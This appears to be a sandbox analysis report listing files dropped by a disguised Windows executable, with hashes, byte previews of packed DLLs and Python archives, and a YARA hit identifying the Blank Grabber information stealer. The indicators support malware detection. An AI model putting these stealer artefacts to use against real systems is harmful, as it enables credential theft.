                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...U.x..........." ......... ...............................................@.......6....`.............................................a............0...............$...#..............T............................................................................rdata..a...........................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):18320
                                                      Entropy (8bit):6.442354238527744
                                                      Encrypted:false
                                                      SSDEEP:384:WyiFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWfhWoLD/HRN74o6hlQDk0:Z6S5yguNvZ5VQgx3SbwA71IkFDxLDv4K
                                                      MD5:9B3F816D29B5304388E21DD99BEBAA7D
                                                      SHA1:1B3F2D34C71F1877630376462DC638085584F41B
                                                      SHA-256:07A5CBA122B1100A1B882C44AC5FFDD8FB03604964ADDF65D730948DEAA831C5
                                                      SHA-512:687F692F188DAD50CD6B90AC67ED15B67D61025B79D82DFF21FF00A45DDC5118F1E0CDC9C4D8E15E6634ED973490718871C5B4CC3047752DEDE5EBDABF0B3C89
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...<.L..........." ......... ...............................................@.......l....`..........................................................0...............$...#..............T............................................................................rdata..............................@..@.rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14728
                                                      Entropy (8bit):6.599830773843352
                                                      Encrypted:false
                                                      SSDEEP:192:W3JD2WfhWv6WULwu0Sc2HnhWgN7aIWof8XEKup3JdqnajKsX55qg9:W3cWfhWvsD/HRN7SX7aJdlGsXl
                                                      MD5:2774D3550B93BA9CBCA42D3B6BB874BD
                                                      SHA1:3FA1FC7D8504199D0F214CCEF2FCFF69B920040F
                                                      SHA-256:90017928A8A1559745C6790BC40BB6EBC19C5F8CDD130BAC9332C769BC280C64
                                                      SHA-512:709F16605A2014DB54D00D5C7A3EF67DB12439FCE3AB555EA524115AAE5BA5BF2D66B948E46A01E8DDBE3AC6A30C356E1042653ED78A1151366C37BFBAF7B4C0
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....n..........." .........................................................0...........`.......................................................... ...................#..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):12688
                                                      Entropy (8bit):6.743408491526782
                                                      Encrypted:false
                                                      SSDEEP:192:WWfHQdujWfhWoiWULwu0Sc2HnhWgN7a8W+UzWQfvXqnajan51L8:WWf9WfhWoUD/HRN7CSWXlOnn8
                                                      MD5:969DAA50C4EF3BD2A8C1D9B2C452F541
                                                      SHA1:3D36A074C3171AD9A3CC4AD22E0E820DB6DB71B4
                                                      SHA-256:B1CFF7F4AAB3303AEC4E95EE7E3C7906C5E4F6062A199C83241E9681C5FCAA74
                                                      SHA-512:41B5A23EA78B056F27BFDAF67A0DE633DE408F458554F747B3DD3FB8D6C33419C493C9BA257475A0CA45180FDF57AF3D00E6A4FDCD701D6ED36EE3D473E9BDAC
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0............`.............................................^............ ...................#..............T............................................................................rdata..n...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                      Category:dropped
                                                      Size (bytes):1332005
                                                      Entropy (8bit):5.586288557050693
                                                      Encrypted:false
                                                      SSDEEP:12288:uttcY+bStOmgRF1+fYNXPh26UZWAzCu7joqYnhjHgkVHdmmPnHz1d1YgCCaYcet:uttcY+UHCiCAd+cqHdmmPHzqEaYcet
                                                      MD5:CCEE0EA5BA04AA4FCB1D5A19E976B54F
                                                      SHA1:F7A31B2223F1579DA1418F8BFE679AD5CB8A58F5
                                                      SHA-256:EEB7F0B3E56B03454868411D5F62F23C1832C27270CEE551B9CA7D9D10106B29
                                                      SHA-512:4F29AC5DF211FEF941BD953C2D34CB0C769FB78475494746CB584790D9497C02BE35322B0C8F5C14FE88D4DD722733EDA12496DB7A1200224A014043F7D59166
                                                      Malicious:false
                                                      Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                      Category:dropped
                                                      Size (bytes):109438
                                                      Entropy (8bit):7.712242620477564
                                                      Encrypted:false
                                                      SSDEEP:3072:R++YkaNdiyzAWb4rgwFTF6iL5pbkwPuNKHvY:7G4rhtbk5NKHvY
                                                      MD5:0E25A99CD43173252C97103893DC27E2
                                                      SHA1:225196581521723F189DB0D8EABD9B07E9985D9F
                                                      SHA-256:D087BB7C85832990ED37DF305FEF0F5B2325BF775754C8A4BC3F523B32020971
                                                      SHA-512:1FF57D7A0FD8CDA8EBCCDA69E053A3E533E6B9028D1FCAB6FC35C6596C0DB6BC7D12DD37028F0B36997711FD546E757012A4E02DAD00A391399ED72A875CA29C
                                                      Malicious:false
                                                      Preview:PK...........W...............stub-o.pyc.........2.e.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1629464
                                                      Entropy (8bit):7.952620301087112
                                                      Encrypted:false
                                                      SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                      MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                      SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                      SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                      SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):29968
                                                      Entropy (8bit):7.677818197322094
                                                      Encrypted:false
                                                      SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                      MD5:08B000C3D990BC018FCB91A1E175E06E
                                                      SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                      SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                      SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):229144
                                                      Entropy (8bit):7.930038440560372
                                                      Encrypted:false
                                                      SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                      MD5:6EDA5A055B164E5E798429DCD94F5B88
                                                      SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
                                                      SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
                                                      SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1838360
                                                      Entropy (8bit):7.993871777145928
                                                      Encrypted:true
                                                      SSDEEP:49152:V3Qjrdlkflw6XCRrGhxicF75ShbujR/3z/x:V3Akflw6krEFwujx/x
                                                      MD5:2F1072DDD9A88629205E7434ED055B3E
                                                      SHA1:20DA3188DABE3D5FA33B46BFE671E713E6FA3056
                                                      SHA-256:D086257A6B36047F35202266C8EB8C1225163BD96B064D31B80F0DBE13DA2ACF
                                                      SHA-512:D8DDDC30733811ED9A9C4AE83AC8F3FC4D8BA3FA8051D95242FBD432FD5BF24122373AC5EEA9FEC78F0DAF7C1133365F519A13CF3F105636DA74820A00A25E9B
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e..e..e.d..e....e.`..e.a..e.f..e....e..d..e..d...e.Bh.r.e.Be..e.B...e.Bg..e.Rich..e.................PE..d....Are.........." ...%..........Q...l...Q...................................m...........`.........................................H.l.d.....l.......l.......`..Y...........|m. ............................l.(.....l.@...........................................UPX0......Q.............................UPX1..........Q.....................@....rsrc.........l.....................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):630736
                                                      Entropy (8bit):6.409476333013752
                                                      Encrypted:false
                                                      SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                      MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                      SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                      SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                      SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):456
                                                      Entropy (8bit):4.447296373872587
                                                      Encrypted:false
                                                      SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                      MD5:4531984CAD7DACF24C086830068C4ABE
                                                      SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                      SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                      SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, Author: Joe Security
                                                      Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):26392
                                                      Entropy (8bit):7.4421662383861555
                                                      Encrypted:false
                                                      SSDEEP:768:iBzQ8aVMpJjRIpQGYY5YiSyvkrUAMxkErl:2M5VOjRIpQGYq7SyMryxHl
                                                      MD5:79BB09417365E9B66C8FB984CBB99950
                                                      SHA1:517522DBCBEFB65E37E309CB06FED86C5F946D79
                                                      SHA-256:94F2BAC05E32CB3791F66EFB3229C932AB71BC3725A417340304219721B0D50D
                                                      SHA-512:1C2129DD4D8FEBE2886E122868956BA6032A03B1297DA095D3E9C02AB33183D964A8F790086E688B0720AB39AA1E8D0FE91FADBBE99035BAF4D7CC5754DE9E64
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..t.s.'.s.'.s.'..7'.s.'...&.s.'...&.s.'...&.s.'...&.s.'(.&.s.'.s.'Ps.'Y..&.s.'(.&.s.'(.&.s.'(.['.s.'(.&.s.'Rich.s.'........PE..d....Are.........." ...%.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):645912
                                                      Entropy (8bit):7.993663369194321
                                                      Encrypted:true
                                                      SSDEEP:12288:71Mao81K77fa+Biph8HGq570OuKcmX1SkHCZO1P5JcLpZBwhfitIKJXQ:6h81KHaHpQGM0Ounm49O1PQBq6SKJXQ
                                                      MD5:5655F540DA3E3BD91402E5E5B09A6D2F
                                                      SHA1:D44DB47026B330D06FA84128FD9F0241F5752011
                                                      SHA-256:AA05807DFA35D6FBE1484728110430802A791F3F8723F824696F2D6BD9C5B69A
                                                      SHA-512:1205DCD5657DCC457F8D02452C47FCB2E7FEE108A675AADDC9F7B82D1F2371E38080A6FA0F767524F835C544F129B6F71B2D716180D196B18A9A6DBEF6C9BF03
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SJ...+...+...+...S...+...T...+...T...+...T...+...T...+..\S...+...+...+..-....+..-....+..-.n..+..-....+..Rich.+..................PE..d....Bre.........." ...%.....0......0........................................`............`..........................................;..."...8.......0.......................]......................................@'..@...........................................UPX0....................................UPX1.............z..................@....rsrc....0...0.......~..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1017720
                                                      Entropy (8bit):6.638795525512885
                                                      Encrypted:false
                                                      SSDEEP:24576:ZLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+o:dyubJvlhrVETiR+o
                                                      MD5:9679F79D724BCDBD3338824FFE8B00C7
                                                      SHA1:5DED91CC6E3346F689D079594CF3A9BF1200BD61
                                                      SHA-256:962C50AFCB9FBFD0B833E0D2D7C2BA5CB35CD339ECF1C33DDFB349253FF95F36
                                                      SHA-512:74AC8DEB4A30F623AF1E90E594D66FE28A1F86A11519C542C2BAD44E556B2C5E03D41842F34F127F8F7F7CB217A6F357604CB2DC6AA5EDC5CBA8B83673D8B8BD
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc*.>0*.>0*.>0#..0..>0*.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6....................................................`A........................................ ...........................H....d..x#......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):302360
                                                      Entropy (8bit):7.988149972534172
                                                      Encrypted:false
                                                      SSDEEP:6144:CtrmB1o+h9g+j16hJQ8BTAXVSjMrybczs6mNqIHf96eVc4P7u/:4qB15h91j12i8xAXVSjM+b3z/0e+O7u/
                                                      MD5:20F206B5B405D837C201B8FB443CFA5A
                                                      SHA1:F06B062505F7218D49A1EF0EA65C6212DC4105B0
                                                      SHA-256:0AE76F7316506BCAA4A59F31817569129FD1BAAABA89032953785DBF9F7A7242
                                                      SHA-512:B36E4AF96BEF6B8C13D509B66C34F1CDF6AC8830267FABC13A811D7D486D938D798B32B4D195FEA762EE550501002674D6681F8985318990B454A5BC5C982088
                                                      Malicious:false
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........K..K..K..B.q.M..^..I..^..F..^..C..^..H..qE.H.....I..K.....qE.J..qE.J..qE..J..qE..J..RichK..........................PE..d....Are.........." ...%.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...\..................@....rsrc................`..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
